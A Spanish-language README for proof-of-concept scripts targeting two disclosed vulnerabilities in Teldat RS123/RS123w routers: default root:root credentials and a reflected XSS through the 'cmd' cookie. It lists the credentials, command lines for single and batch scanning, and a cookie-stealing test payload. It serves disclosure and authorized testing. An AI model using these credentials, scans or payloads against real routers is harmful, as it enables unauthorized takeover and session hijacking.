
PoC para CVE-2022-39996 (XSS Reflejado) y CVE-2022-39997 (Contraseña Débil) en el router Teldat RS123/RS123w
Prueba de concepto para dos vulnerabilidades descubiertas en los enrutadores Teldat RS123 / RS123w.
| ID CVE | Tipo | CWE | CVSS | Gravedad |
|---|---|---|---|---|
| CVE-2022-39996 | XSS Reflejado | CWE-79 | 6.1 | Media |
| CVE-2022-39997 | Contraseña Débil | CWE-521 | 9.8 | Crítica |
Producto afectado: Enrutador Teldat RS123, RS123w
Los enrutadores Teldat RS123/RS123w vienen con credenciales predeterminadas fijas root:root. Los administradores frecuentemente las dejan sin cambiar, lo que permite a atacantes no autenticados obtener acceso administrativo completo a través de Telnet, SSH, HTTP u otros servicios.
Cuenta: root
Contraseña: root

pip install requests paramiko
# Verificación básica (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Verificación completa (todos los servicios incluyendo HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Escaneo por lotes
python CVE-2022-39997.py -f targets.txt
El endpoint /upgrade/index.html refleja el valor de la cookie HTTP cmd en la respuesta sin sanitización. Un atacante puede crear una solicitud maliciosa que contenga JavaScript en la cookie cmd. Cuando un administrador autenticado visita la página, el script se ejecuta en el contexto del navegador de la interfaz web del enrutador, lo que permite el secuestro de sesión o la manipulación de la configuración.
cmd:

pip install requests
# Verificación básica de XSS
python CVE-2022-39996.py -t 192.168.1.1
# Con credenciales de autenticación básica HTTP
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Probar múltiples cargas útiles XSS para confirmación
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generar página HTML de POC independiente
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Carga útil XSS personalizada
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| Archivo | Descripción |
|---|---|
CVE-2022-39997.py | Detección de contraseña débil (Telnet / SSH / HTTP / FTP) |
CVE-2022-39996.py | Detección de XSS reflejado mediante cookie cmd |
Teldat's Router Vulnerability.md | Informe completo de divulgación de vulnerabilidad |
Estos scripts de POC son solo para pruebas de seguridad educativas y autorizadas. No los utilice contra sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas. El autor no se responsabiliza por ningún uso indebido o daño.